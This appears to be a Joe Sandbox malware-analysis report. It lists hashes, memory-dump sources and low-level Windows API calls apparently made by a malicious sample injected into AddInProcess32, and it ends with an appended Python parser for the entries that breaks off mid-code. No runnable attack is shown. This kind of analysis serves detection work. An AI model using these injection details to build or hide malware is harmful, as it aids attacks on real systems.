                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1621C071E056588BEB19CF6B880179DFBF3AFC9200F14C0BAC448A7265EB750A468F51
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: bb2935e882ac735b63e7107dc7be015dd17cfa2a06950e216dd5ff80298fb2e6
                                                                                                                                                                                                                                        • Instruction ID: 567386ccbf991b3af6c5c94b9e47c0999b54e1c1ae5e9fce9a2c3d15bc2e2671
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb2935e882ac735b63e7107dc7be015dd17cfa2a06950e216dd5ff80298fb2e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A52110B1E016198BEB2CCF678841699FBF3AFC9300F14C0BAC40DA6214EA7459528F50
                                                                                                                                                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.1488327453.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5e70000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73f68b9ae5b0ed790188f45e261b19bcde68ab1500f8c7deefe2fb213816f9a2
• Instruction ID: b4224635c18e6f8defe25c169d329446a3e417c25c8c4e7cd9134a2268d0ce66
• Opcode Fuzzy Hash: 73f68b9ae5b0ed790188f45e261b19bcde68ab1500f8c7deefe2fb213816f9a2
• Instruction Fuzzy Hash: BF2188B1E006188BEB18CFABC94179EFAF7AFC8304F14C07AC518A7254EB750A469F50
Memory Dump Source
• Source File: 00000000.00000002.1490540594.000000000A210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a210000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d8fa3062826e5f16b3958191e63e756586c4e89852dd43ef8806a4392936256
• Instruction ID: d8ed62a11fbcdc81a4ba4ef179512045e100618b965fcc869370aee80aa079ca
• Opcode Fuzzy Hash: 0d8fa3062826e5f16b3958191e63e756586c4e89852dd43ef8806a4392936256
• Instruction Fuzzy Hash: 4121F771E216199BEB58CFABD9406DEFBF7EFC8210F14C03AD408A7214EB705A028B51
Memory Dump Source
• Source File: 00000000.00000002.1489728560.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_73c0000_VFylJFPzqX.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a54b24e2ee1589ae0eb2e48178932a19e2d17a6c034c5000e73e6a99c3b56701
• Instruction ID: 7336faf129b17eebf07655328b074c21158a37ac76a67c9c899b5cf820fc3ea9
• Opcode Fuzzy Hash: a54b24e2ee1589ae0eb2e48178932a19e2d17a6c034c5000e73e6a99c3b56701
• Instruction Fuzzy Hash: D221AFB1E016598BEB28CF6BD8417DEFAF7AFC8310F14C0BA950DA6214DB7059968F50
APIs
• GetSystemMetrics.USER32(00000005), ref: 05A2FA8E
• GetSystemMetrics.USER32(00000006), ref: 05A2FAC8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1487871798.0000000005A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_5a20000_VFylJFPzqX.jbxd
Similarity
• API ID: MetricsSystem
• String ID: W
• API String ID: 4116985748-655174618
• Opcode ID: 3087c7ec05953e4f44769e71b5ff8694fa3ad1f844e7fc54e6d407c330bc0642
• Instruction ID: 477e8823bf507daef6e13e873d3cb7dfba45644e45d2d26c597f978d4b84d578
• Opcode Fuzzy Hash: 3087c7ec05953e4f44769e71b5ff8694fa3ad1f844e7fc54e6d407c330bc0642
• Instruction Fuzzy Hash: 592175B0C0434A8FDB10CF9AD44979EFFF0AF48314F24885AE458A7290D3785948CFA5

Execution Graph

Execution Coverage: 1.4%
Dynamic/Decrypted Code Coverage: 2.7%
Signature Coverage: 6%
Total number of Nodes: 549
Total number of Limit Nodes: 68

Control-flow Graph
control_flow_graph 0 41a3da-41a429 call 41af30 NtReadFile
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Strings
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: 91de646ca9939cf2df727c61be254ca9a4b42c672d97e18c7ba6ea618f0c1c13
• Instruction ID: 794ab0cc949bf04e671dc0aa680c827d04dcee994fe3ef64f97f4a408e956d51
• Opcode Fuzzy Hash: 91de646ca9939cf2df727c61be254ca9a4b42c672d97e18c7ba6ea618f0c1c13
• Instruction Fuzzy Hash: 41F0FFB2210108ABCB14DF89DC50DDB77A9AF8C754F158249BE1D97245D630ED51CBA1

Control-flow Graph
control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Strings
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Control-flow Graph
control_flow_graph 243 40acf0-40ad0c 244 40ad14-40ad19 243->244 245 40ad0f call 41cc20 243->245 246 40ad1b-40ad1e 244->246 247 40ad1f-40ad2d call 41d040 244->247 245->244 250 40ad3d-40ad4e call 41b470 247->250 251 40ad2f-40ad3a call 41d2c0 247->251 256 40ad50-40ad64 LdrLoadDll 250->256 257 40ad67-40ad6a 250->257 251->250 256->257
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
• Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95

Control-flow Graph
control_flow_graph 258 41a32a-41a381 call 41af30 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 3239d794ebb1183da48ea9a34df6c4a9be463a02c5b7532882bb7a399a89993a
• Instruction ID: 1f6acbba30b6ddc1c1fecc31a4de8a74763a96ef98365b96f54ac2aee2beb343
• Opcode Fuzzy Hash: 3239d794ebb1183da48ea9a34df6c4a9be463a02c5b7532882bb7a399a89993a
• Instruction Fuzzy Hash: 5B01F2B2201508ABCB08CF88CC80EEB33ADAF8C314F058208BA0DD7240C630E811CBA0

Control-flow Graph
control_flow_graph 261 41a330-41a346 262 41a34c-41a381 NtCreateFile 261->262 263 41a347 call 41af30 261->263 263->262
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4

Control-flow Graph
control_flow_graph 264 41a50a-41a54d call 41af30 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
Memory Dump Source
• Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: 0bd1b5fd80fc2771d45b7b0d2bc21b87da9f544ec152bf7401257f331d30bd1f
• Instruction ID: 333a3124395fd10c7c887a9ae2fee1e863ea7100ed245122367cf52a97435a6f
• Opcode Fuzzy Hash: 0bd1b5fd80fc2771d45b7b0d2bc21b87da9f544ec152bf7401257f331d30bd1f
• Instruction Fuzzy Hash: C4F082B22102046FCB14CF98CC81EEB37A9EF8C314F11824DFA1C97281C235E812CBA4

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 267 41a510-41a526 268 41a52c-41a54d NtAllocateVirtualMemory 267->268 269 41a527 call 41af30 267->269 269->268
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                                                                                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                        • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                                                        • Opcode ID: 20ec1dab1c7e10f3fdcb86be1c0f31b50423aac9201c69477fa6f971da774df3
                                                                                                                                                                                                                                        • Instruction ID: c7470330ce14e16143e16b8e865851a69b492940d029b142d037ba4b6b49d7aa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20ec1dab1c7e10f3fdcb86be1c0f31b50423aac9201c69477fa6f971da774df3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78E08C72A00210AFDB10EFD8CC86ED7BB69EF48720F05449ABE1C6B242C930FA1087D1
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3535843008-0
                                                                                                                                                                                                                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                        • Instruction ID: e9450f8bec15428cdd91297f97b7848412804bda5c7d31b3f0e5b01193c95e83
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3CD01776211214ABD710EB99CC85EE77BACEF48764F15449ABA189B242C530FA1186E0
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 9cbc63c896ff4a40a2b76b89aeafa48c6f8174167711b24c461d7aa015f18837
                                                                                                                                                                                                                                        • Instruction ID: dff79a1577d892636c46d74f21fc9a53cc39affc7984559c62cea13c48772562
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cbc63c896ff4a40a2b76b89aeafa48c6f8174167711b24c461d7aa015f18837
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1390023324140807D1807158440564A100997D3301F95C015A1029654DCB158B5D77A2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                                                                                                                                                                                        • Instruction ID: 01b5e32267ecf2c87cfa22f83328561b82f04bdbe8204e38853a35196788a857
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eaae07484238b6883173be2a3eaa6db5cad591a31f6741c5a68857b8958e55ee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2190026324240007410571584415616500E97E2301B55C021E2018590DC6258A956226
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: f674be096c6658b4fe0c234090efdb084e916c227d96e97b1b33ee894d175d80
                                                                                                                                                                                                                                        • Instruction ID: f540240466e0014c0b17bd654be37648037c51391c2bd6daea7f5532c88c79ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f674be096c6658b4fe0c234090efdb084e916c227d96e97b1b33ee894d175d80
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 86900227251400070105B5580705507104A97D7351355C021F2019550CD7218A655222
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: f373815d23d07ecfd002837c312c2a2425dc694b6a4c50c415b7bb7f8a50534d
                                                                                                                                                                                                                                        • Instruction ID: 091abb4d92b2326c2fd46d0f2223881b3e3fb3549aabf72057f83afffaed1f7a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f373815d23d07ecfd002837c312c2a2425dc694b6a4c50c415b7bb7f8a50534d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0900223282441575545B1584405507500AA7E2341795C012A2418950CC6269A5AD722
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                                                        • Opcode ID: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                                                                                                                                                                                        • Instruction ID: 9473edc388d21f423c3b34fd17467de8e7ca8a41dfc65576a119a59cc63aff75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ba1e2a7e900dee82e0b137773163a304e47696c5ec3c996505a4aff96d4df2d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E90027324140407D14071584405746100997D2301F55C011A6068554EC7598FD96766
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                                                                        • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID: 6EA
                                                                                                                                                                                                                                        • API String ID: 1279760036-1400015478
                                                                                                                                                                                                                                        • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                        • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 205 41a632-41a638 206 41a6b8-41a708 call 41af30 205->206 207 41a63a-41a654 205->207 208 41a65c-41a671 RtlFreeHeap 207->208 209 41a657 call 41af30 207->209 209->208
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                                                        • Opcode ID: 92435f79e61f077360db84d01eede6748c8cdf0f4aa2ed710ffbdee89db9b342
                                                                                                                                                                                                                                        • Instruction ID: 211b378c4f7c60796f100609e00887de9b7fcce71935e91ba448886450722b43
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92435f79e61f077360db84d01eede6748c8cdf0f4aa2ed710ffbdee89db9b342
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52116AB6615148AFCB14DF99DC80DEB3BA9AF8C318F15865AF94D97205C230E856CBB0

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 213 408308-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 222 40835c-40836e PostThreadMessageW 213->222 223 40838e-408392 213->223 224 408370-40838a call 40a480 222->224 225 40838d 222->225 224->225 225->223
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1518903340.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                                                        • Opcode ID: 209d539bb0c684d2849aca3d28b26021fc5e7a81943369bc078ab30c6ed6bd3c
                                                                                                                                                                                                                                        • Instruction ID: e4a28d64b243b541d6d531637dff334c9966267f07dbf2e742c982f33c9bd668
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 209d539bb0c684d2849aca3d28b26021fc5e7a81943369bc078ab30c6ed6bd3c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01B93198031877EB21A6659C43FFE7B5C5B41B54F05016EFF44BA1C2DAE8690542EA
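
Added example, not part of the Joe Sandbox report or its tooling: a small Python parser for the function-summary entries above. It turns each entry's "APIs" lines and "Memory Dump Source" line into a record keyed by the dumped region's base address, so the calls recovered from the 0x400000 image region in AddInProcess32 (RtlAllocateHeap, RtlFreeHeap, PostThreadMessageW with Msg 0x111, which is WM_COMMAND) can be grouped and searched rather than read one entry at a time. The sample input is constructed from lines on this page. Assumptions, also marked in the code: the first dot-separated field of the .sdmp name is the process index and the fourth is the region base (this agrees with the snapshot name hcaresult_3_2_400000_AddInProcess32.jbxd but is inferred, not documented here), and a "?" argument is one the analyzer could not resolve.

```python
import re
from collections import defaultdict

# Added example, not Joe Sandbox code. Parses the per-function "APIs" and
# "Memory Dump Source" lines of a report listing into records per dumped region.

API_RE = re.compile(
    r"^•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
SRC_RE = re.compile(
    r"^•?\s*Source File:\s*(?P<dump>\S+)\.sdmp,\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)$"
)
WM_COMMAND = 0x0111  # user32 message id; the Msg argument of the PostThreadMessageW calls above


def parse_args(raw):
    """Split an argument list: hex values become ints, '?' (unresolved by the analyzer) becomes None."""
    out = []
    for a in raw.split(","):
        a = a.strip()
        if not a:
            continue
        out.append(None if a == "?" else int(a, 16))
    return out


def parse_listing(text):
    """One record per function entry: the API calls listed before its Source File line."""
    records, pending = [], []
    for line in text.splitlines():
        line = line.strip()
        m = API_RE.match(line)
        if m:
            pending.append({"api": m["api"], "module": m["module"],
                            "args": parse_args(m["args"]), "ref": int(m["ref"], 16)})
            continue
        m = SRC_RE.match(line)
        if m:
            fields = m["dump"].split(".")
            records.append({
                # Assumption: field 0 is the process index and field 3 the region base,
                # consistent with the snapshot name hcaresult_3_2_400000_AddInProcess32.jbxd.
                "process_index": int(fields[0]),
                "base": int(fields[3], 16),
                "offset": int(m["offset"], 16),
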